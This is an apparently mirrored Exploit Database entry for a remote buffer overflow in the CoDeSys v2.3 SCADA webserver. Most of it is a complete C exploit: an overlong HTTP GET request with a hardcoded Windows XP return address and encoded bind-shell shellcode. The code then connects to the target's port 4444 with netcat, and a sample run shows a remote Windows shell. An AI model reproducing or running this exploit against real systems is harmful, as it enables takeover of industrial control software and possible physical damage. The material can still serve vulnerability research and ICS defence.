CoDeSys SCADA 2.3 – Remote Buffer Overflow

Exploit Database
118 阅读

作者： Celil Ünüver

日期： 2011-12-01
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/18187/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

See Also: http://aluigi.altervista.org/adv/codesys_1-adv.txt

CoDeSys v2.3 Industrial Control System Development Software

Remote Buffer Overflow Exploit for CoDeSys Scada webserver

Author : Celil UNUVER, SignalSEC Labs

www.signalsec.com

Tested on WinXP SP1 EN

THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!

--snip--

root@bt:~# ./codesys 192.168.1.36

CoDeSys v2.3 webserver Remote Exploit

by SignalSEC Labs - www.signalsec.com

[+]Sending payload to SCADA system!

[+]Connecting to port 4444 to get shell!

192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [192.168.1.36] 4444 (?) open

Microsoft Windows XP [Version 5.1.2600]

C:\Program Files\3S Software\CoDeSys V2.3\visu>

--snip--

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <unistd.h>

#define name "CoDeSys v2.3 webserver Remote Exploit"

#define PORT 8080

#define JUNK "A"

int main ( int argc, char *argv[] )

{

int sock, i, payload;

struct sockaddr_in dest_addr;

char *target = "target";

char request[1600], *ptr;

char ret[] = "\x67\x42\xa7\x71"; //ret - WINXP SP1 EN , mswsock.dll

char hellcode[] =

"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"

"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"

"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"

"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"

"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"

"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"

"\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x37"

"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x58"

"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"

"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"

"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"

"\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x32\x45\x47\x45\x4e\x4b\x58"

"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34"

"\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x52\x4b\x38"

"\x49\x58\x4e\x36\x46\x42\x4e\x41\x41\x36\x43\x4c\x41\x43\x4b\x4d"

"\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x58\x42\x44\x4e\x30\x4b\x48"

"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x30\x50\x35\x4a\x56"

"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46"

"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x36\x47\x37\x43\x57"

"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"

"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"

"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x50"

"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"

"\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x45\x43\x55\x43\x45\x43\x34"

"\x43\x45\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x41\x31"

"\x4e\x35\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a"

"\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41"

"\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"

"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"

"\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x54\x47\x55\x4f\x4f\x48\x4d"

"\x42\x55\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"

"\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x55"

"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36"

"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x32\x4e\x4c"

"\x49\x48\x47\x4e\x4c\x56\x46\x34\x49\x48\x44\x4e\x41\x33\x42\x4c"

"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x52"

"\x43\x39\x4d\x58\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"

"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x34\x4f\x4f"

"\x48\x4d\x4b\x35\x47\x45\x44\x35\x41\x35\x41\x35\x41\x45\x4c\x56"

"\x41\x30\x41\x35\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x56"

"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"

"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f"

"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"

"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x45\x4f\x4f\x48\x4d"

"\x4f\x4f\x42\x4d\x5a";

printf ("\n%s\n by SignalSEC Labs - www.signalsec.com\n", name);

if (argc < 2)

{

printf ("\nUsage: codesys [IP]\n");

exit (-1);

}

setenv (target, argv[1], 1);

memset (request, '\0', sizeof (request));

ptr = request;

strcat (request, "GET /");

for(i = 1; i < 776; i++){

strcat (request, JUNK);

}

strcat (request, ret);

strcat (request, hellcode);

strcat (request, " HTTP/1.1");

strcat (request, "\r\n");

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){

perror("\nsocket error\n");

exit (1);

}

dest_addr.sin_family = AF_INET;

dest_addr.sin_port = htons(PORT);

if (! inet_aton(argv[1], &(dest_addr.sin_addr))) {

perror("inet_aton problems");

exit (2);

}

memset( &(dest_addr.sin_zero), '\0', 8);

if (connect (sock, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){

perror("\nCouldnt connect to target!\n");

close (sock);

exit (3);

}

payload = (send (sock, ptr, strlen(request), 0));

if (payload == -1) {

perror("\nCan not send the payload\n");

close (sock);

exit(4);

}

close (sock);

printf ("\n[+]Sending payload to SCADA system!\n");

sleep (1);

printf ("\n[+]Connecting to port 4444 to get shell!\n");

sleep (2);

system("nc -vv ${target} 4444 || echo 'Sorry exploit failed! Change RET address or be sure target is not patched!'");

exit (0);

}